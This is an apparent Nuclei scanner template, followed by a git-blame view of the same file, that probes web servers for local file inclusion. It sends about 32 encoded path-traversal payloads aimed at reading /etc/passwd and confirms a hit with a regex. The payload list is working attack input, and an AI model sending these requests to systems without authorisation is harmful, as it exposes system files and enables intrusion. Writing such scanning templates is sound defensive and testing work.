http/vulnerabilities/generic/generic-linux-lfi.yaml

id: generic-linux-lfi

info:
  name: Generic Linux - Local File Inclusion
  author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
  severity: high
  description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.
  reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 32
  tags: linux,lfi,generic

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/etc/passwd"
        - "/..%5cetc/passwd"
        - "/..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5cetc/passwd"
        - "/static/..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/./../../../../../../../../../../etc/passwd"
        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
        - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
        - "/..///////..////..//////etc/passwd"
        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
        - "/index.php?page=etc/passwd"
        - "/index.php?page=etc/passwd%00"
        - "/index.php?page=../../etc/passwd"
        - "/index.php?page=....//....//etc/passwd"
        - "/../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4b0a00483046022100fc5a454419b2b363d9c16ddf20a9e4094115faebad7ad94d547e55bcabd33799022100e96e30aad0a39a6821da80d09008fbc1b3cc9e8605fb2c1b2c412824133d5e7f:922c64590222798bb761d5b6d8e72950
moving files around 2021-08-07 23:02:17 +05:30			`id: generic-linux-lfi`

Create generic-lfi.yaml 2020-10-20 15:47:25 +00:00			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 09:45:11 -04:00			`name: Generic Linux - Local File Inclusion`
Update generic-linux-lfi.yaml 2022-08-31 22:01:15 +05:30			`author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK`
Create generic-lfi.yaml 2020-10-20 15:47:25 +00:00			`severity: high`
Improving descriptions (#9048) 2024-01-30 11:47:24 +01:00			`description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.`
Update generic-linux-lfi.yaml 2022-08-31 22:01:15 +05:30			`reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 09:45:11 -04:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Added max request counter of each template 2023-04-28 13:41:21 +05:30			`metadata:`
Revert "Add flow optimization to multiple paylaods/ reqs templates for performance improvement" 2025-07-22 02:07:56 +05:30			`max-request: 32`
templateman update 2023-10-14 16:57:55 +05:30			`tags: linux,lfi,generic`
Create generic-lfi.yaml 2020-10-20 15:47:25 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 09:58:59 +05:30			`http:`
Create generic-lfi.yaml 2020-10-20 15:47:25 +00:00			`- method: GET`
			`path:`
feat: convert paths with lots of elements to payloads 2024-04-12 16:01:51 +05:30			`- "{{BaseURL}}{{paths}}"`
			`payloads:`
			`paths:`
			`- "/etc/passwd"`
			`- "/..%5cetc/passwd"`
			`- "/..%5c..%5cetc/passwd"`
			`- "/..%5c..%5c..%5cetc/passwd"`
			`- "/..%5c..%5c..%5c..%5cetc/passwd"`
			`- "/..%5c..%5c..%5c..%5c..%5cetc/passwd"`
			`- "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"`
			`- "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"`
			`- "/static/..%5cetc/passwd"`
			`- "/static/..%5c..%5cetc/passwd"`
			`- "/static/..%5c..%5c..%5cetc/passwd"`
			`- "/static/..%5c..%5c..%5c..%5cetc/passwd"`
			`- "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"`
			`- "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"`
			`- "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"`
			`- "/./../../../../../../../../../../etc/passwd"`
			`- "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"`
			`- "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"`
			`- "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"`
			`- "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"`
			`- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"`
			`- "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"`
			`- "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"`
			`- "/..///////..////..//////etc/passwd"`
			`- "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"`
			`- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"`
			`- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"`
			`- "/index.php?page=etc/passwd"`
			`- "/index.php?page=etc/passwd%00"`
			`- "/index.php?page=../../etc/passwd"`
			`- "/index.php?page=....//....//etc/passwd"`
			`- "/../../../../../../../../../etc/passwd"`
Update generic-linux-lfi.yaml 2022-08-31 22:03:32 +05:30
Added stop-at-first-match in applicable templates 2021-09-02 17:29:10 +05:30			`stop-at-first-match: true`
Create generic-lfi.yaml 2020-10-20 15:47:25 +00:00			`matchers:`
			`- type: regex`
Generic Template Updated 2021-09-18 20:13:32 +01:00			`regex:`
matcher update to handle edge cases 2021-07-25 03:05:55 +05:30			`- "root:.*:0:0:"`
Create generic-lfi.yaml 2020-10-20 15:47:25 +00:00			`part: body`
chore: sign templates 🤖 2025-08-14 08:29:52 +00:00			`# digest: 4b0a00483046022100fc5a454419b2b363d9c16ddf20a9e4094115faebad7ad94d547e55bcabd33799022100e96e30aad0a39a6821da80d09008fbc1b3cc9e8605fb2c1b2c412824133d5e7f:922c64590222798bb761d5b6d8e72950`